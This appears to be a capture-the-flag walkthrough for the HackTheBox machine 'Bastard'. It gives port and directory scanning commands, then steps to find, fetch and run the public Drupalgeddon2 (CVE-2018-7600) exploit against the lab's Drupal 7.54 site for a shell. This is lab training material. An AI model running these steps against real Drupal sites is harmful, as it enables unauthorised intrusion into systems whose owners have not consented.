Bastard

Required Tools
nmap
droopescan
searchsploit
smbserver.py
nc.exe
certutil.exe
SimpleHTTPServer
Windows-Exploit-Suggester.py
nmap 10.10.10.9 - quick scan of the default top 1000 TCP ports

nmap -sC -sV -A -T4 -Pn -oN Bastard.htb 10.10.10.9

-sC : equivalent to --script=default (run the default NSE scripts)
-sV : Probe open ports to determine service/version info
-A : Enable OS detection, version detection, script scanning, and traceroute (already implies -sC and -sV)
-T4 : Set timing template (higher is faster); 4 is the "aggressive" profile
-Pn : Treat all hosts as online -- skip host discovery (the box does not answer ping)
-oN : Output scan in normal format to the given file (Bastard.htb)

feroxbuster -u http://10.10.10.9 -x pdf -x js,html -x php txt json,docx

gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,old,bak,zip > gobuster.txt

nikto -h http://10.10.10.9 > nikto.txt

Identified the Drupal version (7.54) from the URL below.

Finding the Right Exploit
Starting with searchsploit:
searchsploit drupal 7

This search returns a lot of results. What we need against version 7.54 is remote code execution, and most of the usable entries are labelled "Remote Code Execution", so narrow the list to those:
searchsploit drupal 7 remote code

searchsploit drupal 7.54

We want the standalone (non-Metasploit) version, 44449.rb, which is the Drupalgeddon2 (CVE-2018-7600) Forms API property-injection exploit for Drupal < 7.58 / < 8.5.1. Copy it into the working directory:
searchsploit -m php/webapps/44449.rb

The downloaded file has DOS (CRLF) line endings; convert it to Unix (LF) line endings before running it:
dos2unix 44449.rb

Getting User Shell
ruby 44449.rb http://10.10.10.9
If the script fails with a missing-gem error, install the highline gem it depends on: gem install highline